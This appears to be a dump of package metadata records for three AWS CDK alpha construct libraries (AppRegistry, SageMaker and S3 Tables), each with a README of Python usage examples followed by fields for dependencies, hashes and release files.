08aa603c8d470377b90af250b7dc39032f1dc1793a715dfdc4d4ae4eb250074e
null
[]
0
2.1
aws-cdk.aws-servicecatalogappregistry-alpha
2.239.0a0
The CDK Construct Library for AWS::ServiceCatalogAppRegistry
# AWS ServiceCatalogAppRegistry Construct Library <!--BEGIN STABILITY BANNER-->--- ![cdk-constructs: Experimental](https://img.shields.io/badge/cdk--constructs-experimental-important.svg?style=for-the-badge) > The APIs of higher level constructs in this module are experimental and under active development. > They are subject to non-backward compatible changes or removal in any future version. These are > not subject to the [Semantic Versioning](https://semver.org/) model and breaking changes will be > announced in the release notes. This means that while you may use them, you may need to update > your source code when upgrading to a newer version of this package. --- <!--END STABILITY BANNER--> [AWS Service Catalog App Registry](https://docs.aws.amazon.com/servicecatalog/latest/adminguide/appregistry.html) enables organizations to create and manage repositories of applications and associated resources. ## Table Of Contents * [Application](#application) * [Application-Associator](#application-associator) * [Attribute-Group](#attribute-group) * [Associations](#associations) * [Associating application with an attribute group](#attribute-group-association) * [Associating application with a stack](#resource-association) * [Sharing](#sharing) * [Sharing an application](#sharing-an-application) * [Sharing an attribute group](#sharing-an-attribute-group) The `@aws-cdk/aws-servicecatalogappregistry-alpha` package contains resources that enable users to automate governance and management of their AWS resources at scale. ```python import aws_cdk.aws_servicecatalogappregistry_alpha as appreg ``` ## Application An AppRegistry application enables you to define your applications and associated resources. The application name must be unique at the account level and it's immutable. 
```python application = appreg.Application(self, "MyFirstApplication", application_name="MyFirstApplicationName", description="description for my application" ) ``` An application that has been created outside of the stack can be imported into your CDK app. Applications can be imported by their ARN via the `Application.fromApplicationArn()` API: ```python imported_application = appreg.Application.from_application_arn(self, "MyImportedApplication", "arn:aws:servicecatalog:us-east-1:012345678910:/applications/0aqmvxvgmry0ecc4mjhwypun6i") ``` ## Application-Associator `ApplicationAssociator` defines an AppRegistry application to contain all the stacks deployed through your CDK app. This helps manage all the CDK-deployed resources. ### Create a new application to associate all the stacks in the cdk.App scope If you want to create an Application named `MyAssociatedApplication` in account `123456789012` and region `us-east-1` and want to associate all stacks in the `App` scope to `MyAssociatedApplication`, then use as shown in the example below: ```python from aws_cdk import Environment app = App() associated_app = appreg.ApplicationAssociator(app, "AssociatedApplication", applications=[appreg.TargetApplication.create_application_stack( application_name="MyAssociatedApplication", # 'Application containing stacks deployed via CDK.' is the default application_description="Associated Application description", stack_name="MyAssociatedApplicationStack", # AWS Account and Region that are implied by the current CLI configuration is the default env=Environment(account="123456789012", region="us-east-1") )] ) ``` This will create a stack `MyAssociatedApplicationStack` containing an application `MyAssociatedApplication` with the `TagKey` as `managedBy` and `TagValue` as `CDK_Application_Associator`. By default, the stack will have the Systems Manager Application Manager console URL as its output for the application created.
If you want to remove the output, then use as shown in the example below: ```python from aws_cdk import Environment app = App() associated_app = appreg.ApplicationAssociator(app, "AssociatedApplication", applications=[appreg.TargetApplication.create_application_stack( application_name="MyAssociatedApplication", # 'Application containing stacks deployed via CDK.' is the default application_description="Associated Application description", stack_name="MyAssociatedApplicationStack", # Disables emitting Application Manager url as output emit_application_manager_url_as_output=False, # AWS Account and Region that are implied by the current CLI configuration is the default env=Environment(account="123456789012", region="us-east-1") )] ) ``` ### Import existing application to associate all the stacks in the cdk.App scope If you want to re-use an existing Application with ARN: `arn:aws:servicecatalog:us-east-1:123456789012:/applications/applicationId` and want to associate all stacks in the `App` scope to your imported application, then use as shown in the example below: ```python app = App() associated_app = appreg.ApplicationAssociator(app, "AssociatedApplication", applications=[appreg.TargetApplication.existing_application_from_arn( application_arn_value="arn:aws:servicecatalog:us-east-1:123456789012:/applications/applicationId", stack_name="MyAssociatedApplicationStack" )] ) ``` ### Associate attribute group to the application used by `ApplicationAssociator` If you want to associate an Attribute Group with application created by `ApplicationAssociator`, then use as shown in the example below: ```python import aws_cdk as cdk app = App() associated_app = appreg.ApplicationAssociator(app, "AssociatedApplication", applications=[appreg.TargetApplication.create_application_stack( application_name="MyAssociatedApplication", # 'Application containing stacks deployed via CDK.' 
is the default application_description="Associated Application description", stack_name="MyAssociatedApplicationStack", # AWS Account and Region that are implied by the current CLI configuration is the default env=cdk.Environment(account="123456789012", region="us-east-1") )] ) # Associate application to the attribute group. associated_app.app_registry_application.add_attribute_group("MyAttributeGroup", attribute_group_name="MyAttributeGroupName", description="Test attribute group", attributes={} ) ``` ### Associate stacks deployed by CDK pipelines If you are using CDK Pipelines to deploy your application, the application stacks will be inside Stages, and ApplicationAssociator will not be able to find them. Call `associateStage` on each Stage object before adding it to the Pipeline, as shown in the example below: ```python import aws_cdk as cdk import aws_cdk.pipelines as codepipeline import aws_cdk.aws_codecommit as codecommit # repo: codecommit.Repository # pipeline: codepipeline.CodePipeline # beta: cdk.Stage class ApplicationPipelineStack(cdk.Stack): def __init__(self, scope, id, *, application, description=None, env=None, stackName=None, tags=None, notificationArns=None, synthesizer=None, terminationProtection=None, analyticsReporting=None, crossRegionReferences=None, permissionsBoundary=None, suppressTemplateIndentation=None, propertyInjectors=None): super().__init__(scope, id, application=application, description=description, env=env, stackName=stackName, tags=tags, notificationArns=notificationArns, synthesizer=synthesizer, terminationProtection=terminationProtection, analyticsReporting=analyticsReporting, crossRegionReferences=crossRegionReferences, permissionsBoundary=permissionsBoundary, suppressTemplateIndentation=suppressTemplateIndentation, propertyInjectors=propertyInjectors) # associate the stage to application associator. 
application.associate_stage(beta) pipeline.add_stage(beta) app = App() associated_app = appreg.ApplicationAssociator(app, "AssociatedApplication", applications=[appreg.TargetApplication.create_application_stack( application_name="MyPipelineAssociatedApplication", stack_name="MyPipelineAssociatedApplicationStack", env=cdk.Environment(account="123456789012", region="us-east-1") )] ) cdk_pipeline = ApplicationPipelineStack(app, "CDKApplicationPipelineStack", application=associated_app, env=cdk.Environment(account="123456789012", region="us-east-1") ) ``` ### Associate cross-account stack By default, ApplicationAssociator will not perform cross-account stack associations with the target Application, to avoid deployment failures for accounts that have not been set up for cross-account associations. To enable cross-account stack associations, make sure all accounts are in the same organization as the target Application's account and that resource sharing is enabled within the organization. If you wish to turn on cross-account sharing and associations, set the `associateCrossAccountStacks` field to `true`, as shown in the example below: ```python from aws_cdk import Environment app = App() associated_app = appreg.ApplicationAssociator(app, "AssociatedApplication", applications=[appreg.TargetApplication.create_application_stack( associate_cross_account_stacks=True, application_name="MyAssociatedApplication", env=Environment(account="123456789012", region="us-east-1") )] ) ``` ### Associate cross-region stack Currently, cross-region stack association is not supported. ## Attribute Group An AppRegistry attribute group acts as a container for user-defined attributes for an application. Metadata is attached in a machine-readable format to integrate with automated workflows and tools. The attribute group name must be unique at the account level and it's immutable.
```python attribute_group = appreg.AttributeGroup(self, "MyFirstAttributeGroup", attribute_group_name="MyFirstAttributeGroupName", description="description for my attribute group", # the description is optional, attributes={ "project": "foo", "team": ["member1", "member2", "member3"], "public": False, "stages": { "alpha": "complete", "beta": "incomplete", "release": "not started" } } ) ``` An attribute group that has been created outside of the stack can be imported into your CDK app. Attribute groups can be imported by their ARN via the `AttributeGroup.fromAttributeGroupArn()` API: ```python imported_attribute_group = appreg.AttributeGroup.from_attribute_group_arn(self, "MyImportedAttrGroup", "arn:aws:servicecatalog:us-east-1:012345678910:/attribute-groups/0aqmvxvgmry0ecc4mjhwypun6i") ``` ## Associations You can associate your appregistry application with attribute groups and resources. Resources are CloudFormation stacks that you can associate with an application to group relevant stacks together to enable metadata-rich insights into your applications and resources. A CloudFormation stack can only be associated with one appregistry application. If a stack is associated with multiple applications in your app or is already associated with one, CDK will fail at deploy time.
### Associating application with a new attribute group You can create and associate an attribute group to an application with the `addAttributeGroup()` API: ```python # application: appreg.Application # attribute_group: appreg.AttributeGroup application.add_attribute_group("MyAttributeGroupId", attribute_group_name="MyAttributeGroupName", description="Test attribute group", attributes={} ) ``` ### Associating an attribute group with application You can associate an application with an attribute group with `associateWith`: ```python # application: appreg.Application # attribute_group: appreg.AttributeGroup attribute_group.associate_with(application) ``` ### Associating application with a Stack You can associate a stack with an application with the `associateApplicationWithStack()` API: ```python # application: appreg.Application app = App() my_stack = Stack(app, "MyStack") application.associate_application_with_stack(my_stack) ``` ## Sharing You can share your AppRegistry applications and attribute groups with AWS Organizations, Organizational Units (OUs), AWS accounts within an organization, as well as IAM roles and users. AppRegistry requires that AWS Organizations is enabled in an account before deploying a share of an application or attribute group. ### Sharing an application ```python import aws_cdk.aws_iam as iam # application: appreg.Application # my_role: iam.IRole # my_user: iam.IUser application.share_application("MyShareId", name="MyShare", accounts=["123456789012"], organization_arns=["arn:aws:organizations::123456789012:organization/o-my-org-id"], roles=[my_role], users=[my_user] ) ``` E.g., sharing an application with multiple accounts and allowing the accounts to associate resources to the application. 
```python import aws_cdk.aws_iam as iam # application: appreg.Application application.share_application("MyShareId", name="MyShare", accounts=["123456789012", "234567890123"], share_permission=appreg.SharePermission.ALLOW_ACCESS ) ``` ### Sharing an attribute group ```python import aws_cdk.aws_iam as iam # attribute_group: appreg.AttributeGroup # my_role: iam.IRole # my_user: iam.IUser attribute_group.share_attribute_group("MyShareId", name="MyShare", accounts=["123456789012"], organization_arns=["arn:aws:organizations::123456789012:organization/o-my-org-id"], roles=[my_role], users=[my_user] ) ``` E.g., sharing an attribute group with multiple accounts and allowing the accounts to associate applications to the attribute group. ```python import aws_cdk.aws_iam as iam # attribute_group: appreg.AttributeGroup attribute_group.share_attribute_group("MyShareId", name="MyShare", accounts=["123456789012", "234567890123"], share_permission=appreg.SharePermission.ALLOW_ACCESS ) ```
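The one-application-per-stack rule in the Associations section above can be sketched as a tiny conceptual model. This is plain Python for illustration only; `AssociationRegistry` is a hypothetical name, not a CDK or AppRegistry API, and the real check happens at deploy time:

```python
# Conceptual sketch of "a CloudFormation stack can only be associated with
# one AppRegistry application" (illustrative, not the CDK implementation).
class AssociationRegistry:
    def __init__(self):
        self._stack_to_app = {}

    def associate(self, stack_name, application_name):
        existing = self._stack_to_app.get(stack_name)
        if existing is not None and existing != application_name:
            # Mirrors the deploy-time failure when a stack is associated
            # with more than one application.
            raise ValueError(
                f"stack {stack_name!r} is already associated with {existing!r}"
            )
        self._stack_to_app[stack_name] = application_name

registry = AssociationRegistry()
registry.associate("MyStack", "AppA")  # first association succeeds
# registry.associate("MyStack", "AppB")  # would raise ValueError
```

Re-associating a stack with the same application is a no-op in this model, but a second, different application is rejected.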
text/markdown
Amazon Web Services
null
null
null
Apache-2.0
null
[ "Intended Audience :: Developers", "Operating System :: OS Independent", "Programming Language :: JavaScript", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Typing :: Typed", ...
[]
https://github.com/aws/aws-cdk
null
~=3.9
[]
[]
[]
[ "aws-cdk-lib<3.0.0,>=2.239.0", "constructs<11.0.0,>=10.5.0", "jsii<2.0.0,>=1.126.0", "publication>=0.0.3", "typeguard==2.13.3" ]
[]
[]
[]
[ "Source, https://github.com/aws/aws-cdk.git" ]
twine/6.2.0 CPython/3.11.14
2026-02-19T21:58:20.855775
aws_cdk_aws_servicecatalogappregistry_alpha-2.239.0a0.tar.gz
123,908
1b/7f/8c95927b9935800e015074a02394f43b2da8e982bb0d2d47997915acf55f/aws_cdk_aws_servicecatalogappregistry_alpha-2.239.0a0.tar.gz
source
sdist
null
false
195b524bcfc4133b094946429cb62e4e
a5e60755354bdf98c0b7c5944b16d580e117421b7de84756fa74d72ea4315872
1b7f8c95927b9935800e015074a02394f43b2da8e982bb0d2d47997915acf55f
null
[]
0
2.1
aws-cdk.aws-sagemaker-alpha
2.239.0a0
The CDK Construct Library for AWS::SageMaker
# Amazon SageMaker Construct Library <!--BEGIN STABILITY BANNER-->--- ![cdk-constructs: Experimental](https://img.shields.io/badge/cdk--constructs-experimental-important.svg?style=for-the-badge) > The APIs of higher level constructs in this module are experimental and under active development. > They are subject to non-backward compatible changes or removal in any future version. These are > not subject to the [Semantic Versioning](https://semver.org/) model and breaking changes will be > announced in the release notes. This means that while you may use them, you may need to update > your source code when upgrading to a newer version of this package. --- <!--END STABILITY BANNER--> Amazon SageMaker provides every developer and data scientist with the ability to build, train, and deploy machine learning models quickly. Amazon SageMaker is a fully-managed service that covers the entire machine learning workflow to label and prepare your data, choose an algorithm, train the model, tune and optimize it for deployment, make predictions, and take action. Your models get to production faster with much less effort and lower cost. ## Model To create a machine learning model with Amazon SageMaker, use the `Model` construct. This construct includes properties that can be configured to define model components, including the model inference code as a Docker image and an optional set of separate model data artifacts. See the [AWS documentation](https://docs.aws.amazon.com/sagemaker/latest/dg/sagemaker-marketplace-develop.html) to learn more about SageMaker models.
### Single Container Model In the event that a single container is sufficient for your inference use-case, you can define a single-container model: ```python import aws_cdk.aws_sagemaker_alpha as sagemaker import path as path image = sagemaker.ContainerImage.from_asset(path.join("path", "to", "Dockerfile", "directory")) model_data = sagemaker.ModelData.from_asset(path.join("path", "to", "artifact", "file.tar.gz")) model = sagemaker.Model(self, "PrimaryContainerModel", containers=[sagemaker.ContainerDefinition( image=image, model_data=model_data ) ] ) ``` ### Inference Pipeline Model An inference pipeline is an Amazon SageMaker model that is composed of a linear sequence of multiple containers that process requests for inferences on data. See the [AWS documentation](https://docs.aws.amazon.com/sagemaker/latest/dg/inference-pipelines.html) to learn more about SageMaker inference pipelines. To define an inference pipeline, you can provide additional containers for your model: ```python import aws_cdk.aws_sagemaker_alpha as sagemaker # image1: sagemaker.ContainerImage # model_data1: sagemaker.ModelData # image2: sagemaker.ContainerImage # model_data2: sagemaker.ModelData # image3: sagemaker.ContainerImage # model_data3: sagemaker.ModelData model = sagemaker.Model(self, "InferencePipelineModel", containers=[sagemaker.ContainerDefinition(image=image1, model_data=model_data1), sagemaker.ContainerDefinition(image=image2, model_data=model_data2), sagemaker.ContainerDefinition(image=image3, model_data=model_data3) ] ) ``` ### Model Properties #### Network Isolation If you enable [network isolation](https://docs.aws.amazon.com/sagemaker/latest/dg/mkt-algo-model-internet-free.html), the containers can't make any outbound network calls, even to other AWS services such as Amazon S3. Additionally, no AWS credentials are made available to the container runtime environment. 
To enable network isolation, set the `networkIsolation` property to `true`: ```python import aws_cdk.aws_sagemaker_alpha as sagemaker # image: sagemaker.ContainerImage # model_data: sagemaker.ModelData model = sagemaker.Model(self, "ContainerModel", containers=[sagemaker.ContainerDefinition( image=image, model_data=model_data ) ], network_isolation=True ) ``` ### Container Images Inference code can be stored in the Amazon Elastic Container Registry (Amazon ECR), which is specified via `ContainerDefinition`'s `image` property which accepts a class that extends the `ContainerImage` abstract base class. #### Asset Image Reference a local directory containing a Dockerfile: ```python import aws_cdk.aws_sagemaker_alpha as sagemaker import path as path image = sagemaker.ContainerImage.from_asset(path.join("path", "to", "Dockerfile", "directory")) ``` #### ECR Image Reference an image available within ECR: ```python import aws_cdk.aws_ecr as ecr import aws_cdk.aws_sagemaker_alpha as sagemaker repository = ecr.Repository.from_repository_name(self, "Repository", "repo") image = sagemaker.ContainerImage.from_ecr_repository(repository, "tag") ``` #### DLC Image Reference a deep learning container image: ```python import aws_cdk.aws_sagemaker_alpha as sagemaker repository_name = "huggingface-pytorch-training" tag = "1.13.1-transformers4.26.0-gpu-py39-cu117-ubuntu20.04" image = sagemaker.ContainerImage.from_dlc(repository_name, tag) ``` ### Model Artifacts If you choose to decouple your model artifacts from your inference code (as is natural given different rates of change between inference code and model artifacts), the artifacts can be specified via the `modelData` property which accepts a class that extends the `ModelData` abstract base class. The default is to have no model artifacts associated with a model.
#### Asset Model Data Reference local model data: ```python import aws_cdk.aws_sagemaker_alpha as sagemaker import path as path model_data = sagemaker.ModelData.from_asset(path.join("path", "to", "artifact", "file.tar.gz")) ``` #### S3 Model Data Reference an S3 bucket and object key as the artifacts for a model: ```python import aws_cdk.aws_s3 as s3 import aws_cdk.aws_sagemaker_alpha as sagemaker bucket = s3.Bucket(self, "MyBucket") model_data = sagemaker.ModelData.from_bucket(bucket, "path/to/artifact/file.tar.gz") ``` ## Model Hosting Amazon SageMaker provides model hosting services for model deployment. Amazon SageMaker provides an HTTPS endpoint where your machine learning model is available to provide inferences. ### Endpoint Configuration By using the `EndpointConfig` construct, you can define an endpoint configuration which can be used to provision one or more endpoints. In this configuration, you identify one or more models to deploy and the resources that you want Amazon SageMaker to provision. You define one or more production variants, each of which identifies a model. Each production variant also describes the resources that you want Amazon SageMaker to provision. If you are hosting multiple models, you also assign a variant weight to specify how much traffic you want to allocate to each model. For example, suppose that you want to host two models, A and B, and you assign traffic weight 2 for model A and 1 for model B.
Amazon SageMaker distributes two-thirds of the traffic to Model A, and one-third to model B: ```python import aws_cdk.aws_sagemaker_alpha as sagemaker # model_a: sagemaker.Model # model_b: sagemaker.Model endpoint_config = sagemaker.EndpointConfig(self, "EndpointConfig", instance_production_variants=[sagemaker.InstanceProductionVariantProps( model=model_a, variant_name="modelA", initial_variant_weight=2 ), sagemaker.InstanceProductionVariantProps( model=model_b, variant_name="modelB", initial_variant_weight=1 ) ] ) ``` #### Container Startup Health Check Timeout You can specify a timeout value for your inference container to pass health checks by configuring the `containerStartupHealthCheckTimeout` property. This is useful when your model takes longer to initialize and you want to avoid premature health check failures: ```python import aws_cdk.aws_sagemaker_alpha as sagemaker # model: sagemaker.Model endpoint_config = sagemaker.EndpointConfig(self, "EndpointConfig", instance_production_variants=[sagemaker.InstanceProductionVariantProps( model=model, variant_name="my-variant", container_startup_health_check_timeout=cdk.Duration.minutes(5) ) ] ) ``` The timeout value must be between 60 seconds and 1 hour (3600 seconds). If not specified, Amazon SageMaker uses the default timeout behavior. ### Serverless Inference Amazon SageMaker Serverless Inference is a purpose-built inference option that makes it easy for you to deploy and scale ML models. Serverless endpoints automatically launch compute resources and scale them in and out depending on traffic, eliminating the need to choose instance types or manage scaling policies. For more information, see [SageMaker Serverless Inference](https://docs.aws.amazon.com/sagemaker/latest/dg/serverless-endpoints.html).
To create a serverless endpoint configuration, use the `serverlessProductionVariant` property: ```python import aws_cdk.aws_sagemaker_alpha as sagemaker # model: sagemaker.Model endpoint_config = sagemaker.EndpointConfig(self, "ServerlessEndpointConfig", serverless_production_variant=sagemaker.ServerlessProductionVariantProps( model=model, variant_name="serverlessVariant", max_concurrency=10, memory_size_in_mB=2048, provisioned_concurrency=5 ) ) ``` Serverless inference is ideal for workloads with intermittent or unpredictable traffic patterns. You can configure: * `maxConcurrency`: Maximum concurrent invocations (1-200) * `memorySizeInMB`: Memory allocation in 1GB increments (1024, 2048, 3072, 4096, 5120, or 6144 MB) * `provisionedConcurrency`: Optional pre-warmed capacity to reduce cold starts **Note**: Provisioned concurrency incurs charges even when the endpoint is not processing requests. Use it only when you need to minimize cold start latency. You cannot mix serverless and instance-based variants in the same endpoint configuration. ### Endpoint When you create an endpoint from an `EndpointConfig`, Amazon SageMaker launches the ML compute instances and deploys the model or models as specified in the configuration. To get inferences from the model, client applications send requests to the Amazon SageMaker Runtime HTTPS endpoint. For more information about the API, see the [InvokeEndpoint](https://docs.aws.amazon.com/sagemaker/latest/dg/API_runtime_InvokeEndpoint.html) API. 
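The serverless memory constraint listed above (1 GB increments from 1024 to 6144 MB) can be expressed as a quick validation sketch. This is illustrative plain Python, not a SageMaker or CDK API; `validate_serverless_memory` is a hypothetical helper name:

```python
# Illustrative check of the memorySizeInMB constraint for serverless
# inference (1 GB increments, 1024-6144 MB). Not a SageMaker API.
VALID_MEMORY_MB = (1024, 2048, 3072, 4096, 5120, 6144)

def validate_serverless_memory(memory_mb):
    """Reject memory sizes outside the documented serverless options."""
    if memory_mb not in VALID_MEMORY_MB:
        raise ValueError(f"memorySizeInMB must be one of {VALID_MEMORY_MB}")
    return memory_mb

validate_serverless_memory(2048)   # accepted
# validate_serverless_memory(1500) # would raise ValueError
```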
Defining an endpoint requires at minimum the associated endpoint configuration: ```python import aws_cdk.aws_sagemaker_alpha as sagemaker # endpoint_config: sagemaker.EndpointConfig endpoint = sagemaker.Endpoint(self, "Endpoint", endpoint_config=endpoint_config) ``` ### AutoScaling To enable autoscaling on the production variant, use the `autoScaleInstanceCount` method: ```python import aws_cdk.aws_sagemaker_alpha as sagemaker # model: sagemaker.Model variant_name = "my-variant" endpoint_config = sagemaker.EndpointConfig(self, "EndpointConfig", instance_production_variants=[sagemaker.InstanceProductionVariantProps( model=model, variant_name=variant_name ) ] ) endpoint = sagemaker.Endpoint(self, "Endpoint", endpoint_config=endpoint_config) production_variant = endpoint.find_instance_production_variant(variant_name) instance_count = production_variant.auto_scale_instance_count( max_capacity=3 ) instance_count.scale_on_invocations("LimitRPS", max_requests_per_second=30 ) ``` For load testing guidance on determining the maximum requests per second per instance, please see this [documentation](https://docs.aws.amazon.com/sagemaker/latest/dg/endpoint-scaling-loadtest.html). ### Metrics To monitor CloudWatch metrics for a production variant, use one or more of the metric convenience methods: ```python import aws_cdk.aws_sagemaker_alpha as sagemaker # endpoint_config: sagemaker.EndpointConfig endpoint = sagemaker.Endpoint(self, "Endpoint", endpoint_config=endpoint_config) production_variant = endpoint.find_instance_production_variant("my-variant") production_variant.metric_model_latency().create_alarm(self, "ModelLatencyAlarm", threshold=100000, evaluation_periods=3 ) ```
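The two-thirds/one-third split in the variant-weight example above follows from normalizing each weight by the total. A quick sketch of that arithmetic (plain Python, not a SageMaker API; the function name is a stand-in):

```python
# Traffic share per production variant = weight / sum(all weights).
from fractions import Fraction

def traffic_shares(weights):
    """Map variant name -> exact fraction of traffic it receives."""
    total = sum(weights.values())
    return {name: Fraction(w, total) for name, w in weights.items()}

# Weights 2 and 1, as in the EndpointConfig example:
shares = traffic_shares({"modelA": 2, "modelB": 1})
# modelA receives 2/3 of the traffic, modelB receives 1/3.
```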
text/markdown
Amazon Web Services
null
null
null
Apache-2.0
null
[ "Intended Audience :: Developers", "Operating System :: OS Independent", "Programming Language :: JavaScript", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Typing :: Typed", ...
[]
https://github.com/aws/aws-cdk
null
~=3.9
[]
[]
[]
[ "aws-cdk-lib<3.0.0,>=2.239.0", "constructs<11.0.0,>=10.5.0", "jsii<2.0.0,>=1.126.0", "publication>=0.0.3", "typeguard==2.13.3" ]
[]
[]
[]
[ "Source, https://github.com/aws/aws-cdk.git" ]
twine/6.2.0 CPython/3.11.14
2026-02-19T21:58:19.934270
aws_cdk_aws_sagemaker_alpha-2.239.0a0.tar.gz
180,400
2f/cd/f4bffd71297c6b7fa6776733dcab6ea5b421c0343b2669d4c3788e0c6716/aws_cdk_aws_sagemaker_alpha-2.239.0a0.tar.gz
source
sdist
null
false
0436c2670450744ebcafd6c2fa208f4e
08b843ff7d8379eff5be8898ab18309fbf3dcc3909092829ce7280fdadbf6e45
2fcdf4bffd71297c6b7fa6776733dcab6ea5b421c0343b2669d4c3788e0c6716
null
[]
0
2.1
aws-cdk.aws-s3tables-alpha
2.239.0a0
CDK Constructs for S3 Tables
# Amazon S3 Tables Construct Library <!--BEGIN STABILITY BANNER-->--- ![cdk-constructs: Experimental](https://img.shields.io/badge/cdk--constructs-experimental-important.svg?style=for-the-badge) > The APIs of higher level constructs in this module are experimental and under active development. > They are subject to non-backward compatible changes or removal in any future version. These are > not subject to the [Semantic Versioning](https://semver.org/) model and breaking changes will be > announced in the release notes. This means that while you may use them, you may need to update > your source code when upgrading to a newer version of this package. --- <!--END STABILITY BANNER--> ## Amazon S3 Tables Amazon S3 Tables deliver the first cloud object store with built-in Apache Iceberg support and streamline storing tabular data at scale. [Product Page](https://aws.amazon.com/s3/features/tables/) | [User Guide](https://docs.aws.amazon.com/AmazonS3/latest/userguide/s3-tables.html) ## Usage ### Define an S3 Table Bucket ```python from aws_cdk.aws_s3tables_alpha import UnreferencedFileRemoval # Build a Table bucket sample_table_bucket = TableBucket(scope, "ExampleTableBucket", table_bucket_name="example-bucket-1", # optional fields: unreferenced_file_removal=UnreferencedFileRemoval( status=UnreferencedFileRemovalStatus.ENABLED, noncurrent_days=20, unreferenced_days=20 ) ) ``` ### Define an S3 Tables Namespace ```python # Build a namespace sample_namespace = Namespace(scope, "ExampleNamespace", namespace_name="example-namespace-1", table_bucket=table_bucket ) ``` ### Define an S3 Table ```python from aws_cdk.aws_s3tables_alpha import IcebergMetadataProperty, IcebergSchemaProperty, SchemaFieldProperty, SchemaFieldProperty, CompactionProperty, SnapshotManagementProperty # Build a table sample_table = Table(scope, "ExampleTable", table_name="example_table", namespace=namespace, open_table_format=OpenTableFormat.ICEBERG, without_metadata=True ) # Build a table with an Iceberg 
Schema sample_table_with_schema = Table(scope, "ExampleSchemaTable", table_name="example_table_with_schema", namespace=namespace, open_table_format=OpenTableFormat.ICEBERG, iceberg_metadata=IcebergMetadataProperty( iceberg_schema=IcebergSchemaProperty( schema_field_list=[SchemaFieldProperty( name="id", type="int", required=True ), SchemaFieldProperty( name="name", type="string" ) ] ) ), compaction=CompactionProperty( status=Status.ENABLED, target_file_size_mb=128 ), snapshot_management=SnapshotManagementProperty( status=Status.ENABLED, max_snapshot_age_hours=48, min_snapshots_to_keep=5 ) ) ``` Learn more about table buckets maintenance operations and default behavior from the [S3 Tables User Guide](https://docs.aws.amazon.com/AmazonS3/latest/userguide/s3-table-buckets-maintenance.html) ### Controlling Table Bucket Permissions ```python # Grant the principal read permissions to the bucket and all tables within account_id = "123456789012" table_bucket.grant_read(iam.AccountPrincipal(account_id), "*") # Grant the role write permissions to the bucket and all tables within role = iam.Role(stack, "MyRole", assumed_by=iam.ServicePrincipal("sample")) table_bucket.grant_write(role, "*") # Grant the user read and write permissions to the bucket and all tables within table_bucket.grant_read_write(iam.User(stack, "MyUser"), "*") # Grant permissions to the bucket and a particular table within it table_id = "6ba046b2-26de-44cf-9144-0c7862593a7b" table_bucket.grant_read_write(iam.AccountPrincipal(account_id), table_id) # Add custom resource policy statements permissions = iam.PolicyStatement( effect=iam.Effect.ALLOW, actions=["s3tables:*"], principals=[iam.ServicePrincipal("example.aws.internal")], resources=["*"] ) table_bucket.add_to_resource_policy(permissions) ``` ### Controlling Table Bucket Encryption Settings S3 TableBuckets have SSE (server-side encryption with AES-256) enabled by default with S3 managed keys. 
You can also bring your own KMS key for KMS-SSE or have S3 create a KMS key for you. If a bucket is encrypted with KMS, grant functions on the bucket will also grant access to the TableBucket's associated KMS key. ```python # Provide a user defined KMS Key: key = kms.Key(scope, "UserKey") encrypted_bucket = TableBucket(scope, "EncryptedTableBucket", table_bucket_name="table-bucket-1", encryption=TableBucketEncryption.KMS, encryption_key=key ) # This account principal will also receive kms:Decrypt access to the KMS key encrypted_bucket.grant_read(iam.AccountPrincipal("123456789012"), "*") # Use S3 managed server side encryption (default) encrypted_bucket_default = TableBucket(scope, "EncryptedTableBucketDefault", table_bucket_name="table-bucket-3", encryption=TableBucketEncryption.S3_MANAGED ) ``` When using KMS encryption (`TableBucketEncryption.KMS`), if no encryption key is provided, CDK will automatically create a new KMS key for the table bucket with necessary permissions. ```python # If no key is provided, one will be created automatically encrypted_bucket_auto = TableBucket(scope, "EncryptedTableBucketAuto", table_bucket_name="table-bucket-2", encryption=TableBucketEncryption.KMS ) ``` ### Controlling Table Permissions ```python # Grant the principal read permissions to the table account_id = "123456789012" table.grant_read(iam.AccountPrincipal(account_id)) # Grant the role write permissions to the table role = iam.Role(stack, "MyRole", assumed_by=iam.ServicePrincipal("sample")) table.grant_write(role) # Grant the user read and write permissions to the table table.grant_read_write(iam.User(stack, "MyUser")) # Grant an account permissions to the table table.grant_read_write(iam.AccountPrincipal(account_id)) # Add custom resource policy statements permissions = iam.PolicyStatement( effect=iam.Effect.ALLOW, actions=["s3tables:*"], principals=[iam.ServicePrincipal("example.aws.internal")], resources=["*"] ) table.add_to_resource_policy(permissions) ``` ## Coming 
Soon L2 Construct support for: * KMS encryption support for Tables
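As context for the grant behavior described above, a KMS-encrypted table bucket's grant methods must hand out key permissions alongside the bucket permissions, or a principal could be allowed to read the table yet be unable to decrypt it. A hypothetical plain-Python model of that fan-out (the action names are illustrative, not the construct's actual implementation):

```python
def grant_read(policies: dict, principal: str, encrypted_with_kms: bool) -> None:
    """Model of a bucket grant also covering the bucket's KMS key."""
    actions = {"s3tables:GetTableData"}  # illustrative bucket action
    if encrypted_with_kms:
        # Grants on a KMS-encrypted bucket also cover the associated key.
        actions.add("kms:Decrypt")
    policies.setdefault(principal, set()).update(actions)


policies: dict = {}
grant_read(policies, "123456789012", encrypted_with_kms=True)
```

After the call, the account principal holds both the bucket action and `kms:Decrypt`, mirroring the behavior `TableBucket.grant_read` is documented to have on encrypted buckets.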
text/markdown
Amazon Web Services
null
null
null
Apache-2.0
null
[ "Intended Audience :: Developers", "Operating System :: OS Independent", "Programming Language :: JavaScript", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Typing :: Typed", ...
[]
https://github.com/aws/aws-cdk
null
~=3.9
[]
[]
[]
[ "aws-cdk-lib<3.0.0,>=2.239.0", "constructs<11.0.0,>=10.5.0", "jsii<2.0.0,>=1.126.0", "publication>=0.0.3", "typeguard==2.13.3" ]
[]
[]
[]
[ "Source, https://github.com/aws/aws-cdk.git" ]
twine/6.2.0 CPython/3.11.14
2026-02-19T21:58:19.126214
aws_cdk_aws_s3tables_alpha-2.239.0a0.tar.gz
128,599
21/53/fc54a31f1643556df1baa46dd68dfcd082f293bdcce6d6458b0bb15fc72a/aws_cdk_aws_s3tables_alpha-2.239.0a0.tar.gz
source
sdist
null
false
957cc8d839d7b5ba753f3e92411fff7d
33f916c9df85205261d12dfecbfc51269d13db79e61ae9ee96791b02bf768d10
2153fc54a31f1643556df1baa46dd68dfcd082f293bdcce6d6458b0bb15fc72a
null
[]
0
2.1
